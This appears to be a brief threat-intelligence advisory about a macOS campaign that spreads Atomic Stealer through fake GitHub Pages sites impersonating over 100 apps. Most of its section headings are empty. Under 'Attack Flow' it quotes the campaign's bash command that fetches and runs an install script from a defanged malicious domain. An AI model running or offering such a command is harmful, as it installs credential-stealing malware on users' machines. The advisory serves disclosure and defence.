In September 2025, threat intelligence teams at LastPass and Malwarebytes identified a large-scale macOS-targeted malware campaign leveraging GitHub Pages and SEO manipulation to distribute Atomic Stealer (AMOS). Cybercriminals are impersonating over 100 legitimate applications, redirecting users to malicious installers that silently deploy infostealer malware. This campaign poses significant risk to organizations relying on Mac endpoints and highlights the expanding abuse of open-source platforms for malware delivery.
1. Attack Vector:
2. The Malware: Atomic Stealer (AMOS):
3. Impersonated Software
Full list includes more than 100 impersonated apps from various industries.
4. Attack Flow
/bin/bash -c “$(curl -fsSL https://gosreestr[.]com/hun/install.sh)”
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